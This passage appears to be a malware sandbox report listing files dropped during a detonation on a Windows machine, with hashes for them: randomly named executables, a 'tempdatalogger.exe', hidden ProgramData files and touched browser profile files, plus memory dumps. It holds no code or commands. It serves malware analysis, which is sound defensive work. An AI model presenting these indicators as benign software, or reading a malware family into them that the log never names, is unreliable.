SHA512 7b10e13b3723db0e826b7c7a52090de999626d5fa6c8f9b4630fdeef515a58c40660fa90589532a6d4377f003b3cb5b9851e276a0b3c83b9709e28e6a66a1d32

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\charset_normalizer\md__mypyc.pyd

MD5 d8f690eae02332a6898e9c8b983c56dd
SHA1 112c1fe25e0d948f767e02f291801c0e4ae592f0
SHA256 c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9
SHA512 e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\unicodedata.pyd

MD5 a8ed52a66731e78b89d3c6c6889c485d
SHA1 781e5275695ace4a5c3ad4f2874b5e375b521638
SHA256 bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7
SHA512 1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_ctypes.pyd

MD5 5377ab365c86bbcdd998580a79be28b4
SHA1 b0a6342df76c4da5b1e28a036025e274be322b35
SHA256 6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93
SHA512 56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\win32api.pyd

MD5 e9d8ab0e7867f5e0d40bd474a5ca288c
SHA1 e7bdf1664099c069ceea18c2922a8db049b4399a
SHA256 df724f6abd66a0549415abaa3fdf490680e6e0ce07584e964b8bfd01e187b487
SHA512 49b17e11d02ae99583f835b8ecf526cf1cf9ceab5d8fac0fbfaf45411ac43f0594f93780ae7f6cb3ebbc169a91e81dd57a37c48a8cd5e2653962ffbdcf9879bb

memory/4036-274-0x000001C9EB3A0000-0x000001C9EB3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tzagq5gn.lph.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4972-286-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/4120-299-0x0000000000E20000-0x00000000012C1000-memory.dmp

memory/1556-333-0x00007FF717560000-0x00007FF718101000-memory.dmp

memory/4328-340-0x00007FF7EF760000-0x00007FF7F0DAB000-memory.dmp

memory/2668-341-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4120-342-0x0000000000E20000-0x00000000012C1000-memory.dmp

memory/2668-343-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-348-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-349-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-352-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\a1vsr\8q9rieukn

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

memory/2668-356-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4972-357-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2668-365-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4552-374-0x0000000000ED0000-0x00000000015BE000-memory.dmp

memory/2668-378-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-379-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-385-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\scoped_dir5104_142832076\b9cee862-a499-4ed8-9bd8-6226bdc5712d.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir5104_142832076\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 528c19dd04f37158aa1423f4aabf34db
SHA1 b6720db0b8aa91e9efff45e89443836864d3253e
SHA256 ef1b268029d02fa23ed517b3cdeaa9a5eef774d3c034e0c50f5e5df6495dc248
SHA512 3cfaa7a90160eb2157f4fe88dbb9a0fdb942267b51ee2b090d774e522a256d39d502cb9677e9597c604c9a9d4c35378d3208c4572f410d184b460cd2c212526e

memory/2668-809-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4972-810-0x0000000000360000-0x000000000080B000-memory.dmp

memory/2668-811-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-812-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-813-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1bed6483de34dd709e03fd3af839a76b
SHA1 3724a38c9e51fcce7955a59955d16bf68c083b92
SHA256 37a42554c291f46995b2487d08d80d94cefe6c7fb3cb4ae9c7c5e515d6b5e596
SHA512 264f6687ea8a8726b0000de1511b7b764b3d5a6f64946bb83a58effda42839e593de43865dafeeb89f5b78cc00d16f3979b417357fa2799ca0533bdf72f07fda

memory/4552-820-0x0000000000ED0000-0x00000000015BE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a9e52146-99e6-4c0e-ad53-f6613a41c995.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fe6fb7ffeb0894d21284b11538e93bb4
SHA1 80c71bf18f3798129931b1781115bbef677f58f0
SHA256 e36c911b7dbea599da8ed437b46e86270ce5e0ac34af28ac343e22ecff991189
SHA512 3a8bd7b31352edd02202a7a8225973c10e3d10f924712bb3fffab3d8eea2d3d132f137518b5b5ad7ea1c03af20a7ab3ff96bd99ec460a16839330a5d2797753b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fb62838bcb79d3351d56db0d8a755a13
SHA1 df67f13d2c54351d7d0882981b24c542455339ab
SHA256 7266ee7b59366d7719432a9fc1e09d5053ba8c438562bed25addd1eb264d01ad
SHA512 94a6a45819c7cec809a5b2f550f3b187e004cc5057500fe02d345c68686bd66f0ac9f4e8e23d66df4e3022d6a666e0f7d189f7ab050fcff0126ba9be7885a03b

memory/2668-844-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-846-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-849-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-853-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-854-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-858-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-859-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe

MD5 35a4dfb5f0308d20b1e5bf26e0a70509
SHA1 0c72b35b74dadbce4a95c034968913de271aae06
SHA256 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339
SHA512 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

memory/2668-877-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5040-879-0x0000000000010000-0x0000000000F24000-memory.dmp

memory/2668-880-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4972-881-0x0000000000360000-0x000000000080B000-memory.dmp

memory/2668-884-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5040-885-0x000000001BB50000-0x000000001C6B6000-memory.dmp

memory/2668-887-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-888-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4036-892-0x000001BF7B600000-0x000001BF7BBB6000-memory.dmp

memory/4036-896-0x000001BF7BFF0000-0x000001BF7BFFA000-memory.dmp

memory/4036-897-0x000001BF7E0D0000-0x000001BF7E146000-memory.dmp

memory/2668-898-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-899-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-901-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\ProgramData\a1vsr\fctr1d

MD5 cb2d9667b30daf2bf332fd7c5966fa60
SHA1 10a35ead39eb5740a3714ac8f8903b07b191707e
SHA256 ce7e6652915e2f30c792af884ef3452964c945090a12f8e3f28291caafc7070b
SHA512 3051b56ca1ca6127adec2f7d0ea987d2fed000a2c24f819a0725f1d7c230e1bab1796973e880e2e6a159d00b3b0066f1fb7910798927463ec4fcde3b7d65d462

C:\ProgramData\a1vsr\f3ekn7

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

memory/5492-940-0x0000000000360000-0x000000000080B000-memory.dmp

memory/5492-942-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/5704-955-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

memory/5488-973-0x0000000000D00000-0x0000000001013000-memory.dmp

memory/5704-974-0x0000000000400000-0x0000000000840000-memory.dmp

memory/5488-981-0x0000000000D00000-0x0000000001013000-memory.dmp

memory/5636-982-0x00000000008A0000-0x0000000000D5D000-memory.dmp

memory/5636-984-0x00000000008A0000-0x0000000000D5D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe

MD5 2012699a5e85cd283323c324aa061bc7
SHA1 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f
SHA256 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5
SHA512 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683

memory/5988-998-0x0000000000530000-0x0000000000BC7000-memory.dmp

memory/5988-1000-0x0000000000530000-0x0000000000BC7000-memory.dmp

C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

MD5 ffb5c5f8bab4598fada3bbf92d02d66d
SHA1 ae8096c1f160c97874179ea878a61f69bfb9941a
SHA256 f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1
SHA512 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe

MD5 e935a122d4c4e9c1b44368821a5154ff
SHA1 c93e4b9fb9563cb04a9cd39c75220eaf6007f98f
SHA256 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4
SHA512 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\564777e0-8866-4916-bc1b-5a8844dcd090

MD5 860f8d9628b970e6d7438d4c293868d9
SHA1 bbbd7893b89f9c8d31b0fb3b3fbbcef52c2abd97
SHA256 6c6e118ec42c542f00cfa8a3c5734ff91d2f593493a72b2164c7c9c3de6572de
SHA512 bc85a91605caaf79cadd87d6320fcda6514aceb8fb038aa0393a4d3fd4dd07973b967cb3780191f3dde2a632f43914d27b13c0d9c09b6d073aa197076d46c48b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\8c3d6871-4104-4bc1-8dea-f3de51adf36b

MD5 6ba26cd5ca6965b556f8b74797ef24fa
SHA1 0db4c5ac46d5993f4deec507b7357fe0afbf22ae
SHA256 50dd80388dd368d458cabf2cea29d93ac6aec55f0055be3ff2759a11947c5d40
SHA512 e0b05862adb9e7ce06f8815dc0971d30a887a7d56405ce6bc2e49d4d0df2a72722acaac96dd887eb8f2b886a2fcd51cdd3b92c0435abd9a0a35a2ae097a0c650

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\d256b6b1-10e5-4c09-a31b-27a1a7c745b9

MD5 d566122edbe2cf117f004e7690b9478b
SHA1 cedaeaae4c2c2bc9af77eb83a885d62525f2fe2c
SHA256 799ce04dd184179e6ed8e31fed2861c4ad4f5315c7f08ef40f15b112f3c59c7e
SHA512 ab47489716b03acc4cb6348f99250fe97ae9c24cc641dff640ace0c5187685823010c886386644bdbd08029339a08afb2d3088e7d24bcd4d0d66142f7a0a6b71

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

MD5 5d30e9686990fb3211eb78843b1622f7
SHA1 f03dd2aa9f4f5a1c9144e777b0854ca3a009660d
SHA256 dcf066016635a8ec2fb98b3e4f41ea8292ee4229ff2422a6e5d6a5e00589c74f
SHA512 b7695364ffee2d7c8320618e54487cf919339ba85a6575db3854040f7984544e24e7cf52fe0e21dc45b4f39e4b826106ef9884b44bf338afa279c15e4a297bab

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

MD5 557dff65cd526335bec2632c878841f4
SHA1 0378129632069854b60cb7d67347b272a715b84d
SHA256 34770a860f39bfa808c1067cecc4cb03d9f68b369517e57c6ce6abe97104a131
SHA512 ab5e8a3e9f6f9138d4c84118e3ad42ca6fed1ee2b9f921a8329523a6eb3cdb419ea515f14d1f5f108c95307f936170c373e89a8d029ff53a9dfdcb812a33af91

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

MD5 9d3b009986091756fabb26cf50f66cea
SHA1 5ee025b31387ecbf85ca444e6aeefdf9db805837
SHA256 3cfa0e94d0ea5e4c5c8db775753b1c1dfc48c2ca587bb811cc6db667fe4b1a99
SHA512 0f37e0e3997b9039f91a591d803c089fb3ebad2a5a7bc7b304576fd65297adc503686a1c729ecc1d0af8d9c5a1d35688f728ab3ee7061b75d9ef48120f0a4878

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\activity-stream.discovery_stream.json

MD5 ab18c9c83414f858d99878bbe8d1cc5c
SHA1 ea004fa2c856fcfa8798aa395332879a199297b4
SHA256 0a8a6ffeb724a52098589b313e384d9cbbc18fd22ec6d84fc8f9a5ac53b4d9ac
SHA512 a303a9c43226b2b3e6f86de2fe31bc6a561f18478a782fe86df9d5d9b5a773d93f0052960f2e1d20091f467de1c8d2f00839f135a92c5cfe0be248d95620ed7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

MD5 f6b801a414a8eec7b9e9b8f71472e650
SHA1 bd804d35e090da1e743bff3e7cfce56881fac9b5
SHA256 7407c0b24708bd820263fbb9f28d2632d21550cf29fdf271a6d430a603a627f8
SHA512 3f6e0319b9d42b82bfb809c5a78550990a64ce7116d7cdc4dc92368a1ee730b8e06d3c50b885c8cb060e7a9f4762ba91218a956a471c2aafa61325be25407c10

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

MD5 b45abd74f42f374d4a31983748a6ddc0
SHA1 ed5d1ec3e25f9b387934b7e64bc401968b6d6494
SHA256 35efd5c260de1a5d6510b42ad1583457b9f4983df3fc94566742bf78b5986dd4
SHA512 bfb6e99ae1e911affb2fca2bf03184e1d1e7af4b5558ac8a93807e2552945671bfc5f6176f5ade47ef3a594a062187a29b5f90b1604ae5c795b9494b02177e81

C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe

MD5 e787e8998f5306a754d625d7e29bbeb5
SHA1 14e056dbf0b3991664910ee3a1d23a4bb2c0253d
SHA256 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d
SHA512 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6

memory/3488-1362-0x0000000000E60000-0x00000000012D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

MD5 b89b59e530d8c8a4d9124be53eee914c
SHA1 f1917348880032e298f4951f11887e83b497247c
SHA256 7a0bf4e23ea9cdd91a73b426008d4498206bef48066cf22fc2904d7a4e6168e6
SHA512 e6fb78d37b44b4f0ac4bf2238b98950a068ce9a7292ae9eae2d9a96ad456b4dc3cd001efeb11ab65d27fcf748517dc0df1c3b59a0ae3890cd0c4cda87ea1b985

memory/3488-1368-0x0000000000E60000-0x00000000012D2000-memory.dmp

memory/3488-1369-0x0000000000E60000-0x00000000012D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe

MD5 745e4bcf3d176ea5e82a7c26a6733757
SHA1 499cf0a28c9469faabae1e0f998c6a9b3e82862f
SHA256 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63
SHA512 bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d

memory/408-1412-0x0000000000890000-0x0000000000B99000-memory.dmp

memory/3488-1413-0x0000000000E60000-0x00000000012D2000-memory.dmp

memory/3488-1416-0x0000000000E60000-0x00000000012D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/736-1432-0x0000000000CF0000-0x0000000000D00000-memory.dmp

memory/408-1437-0x0000000000890000-0x0000000000B99000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

MD5 dc23df6cb5e6ac1037bded282158f47e
SHA1 bdf55bc798b4eb6b83c800ed6b322b9d372bdc26
SHA256 f50d535cfbab2329ba8cf6ea5e1bc0f9ab962209c2f9d16891c19d8e67f6a639
SHA512 a85e69f578cff24e1050559eb1473ec1b9a2d65208842355590a919cdb2d1df1c18aae7feb0c1c8097012b77ceb8dac5a8828741f029ae3b8142f74177141731

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

MD5 08abcd3ab82ccf2f1e8ff45d3d04f6a8
SHA1 8a52850dd717edd2dc6ee774d55ba7e7ac4d6d21
SHA256 92905509365412b2cb4cac9f2c1337b89632110178e88a042ea99ec5d0783460
SHA512 790f3443b024ee782bc59e905fdb896dcdd0293fc3352efc9e02c90daddc6ed3bc86871919af95faa103d51913cb73a9397bfa9ec5fa606db4de4b615aec507d

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe

MD5 8a632abe880092fb8fe1d3c882c417a5
SHA1 d3773cc8e6dc6dcd757a5cbc3269b435885fbbf4
SHA256 7f37d73657533b0e599dfac9fb0267c3e38342f1aeb475e3b72421440c95ece7
SHA512 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 f6bdd0d6e8b2933559ffbba6b877ec10
SHA1 151ae40fe11b8cecf510210bc6dc09f2e6f064e8
SHA256 efc5bc696e5d7e08e5f58659d4cae4fd660678389c9ab4f17de9ce174d597554
SHA512 2ddb4c48a337f4edecea6f78ead6a0116a9a0b4399f58d2f7347892f998c41fa295dff586bcd394fbaf569bc73ff96c8c037067b39f557a93a7433c3623870a1

memory/3144-1606-0x00000000027D0000-0x0000000002806000-memory.dmp

memory/3144-1607-0x0000000004FB0000-0x00000000055D8000-memory.dmp

memory/3144-1626-0x0000000005610000-0x0000000005632000-memory.dmp

memory/3144-1629-0x0000000005730000-0x0000000005796000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 c71d75af8d0f8889d4709a98ecf876f5
SHA1 f3cba58335cf14086a092387dd32722b606b2006
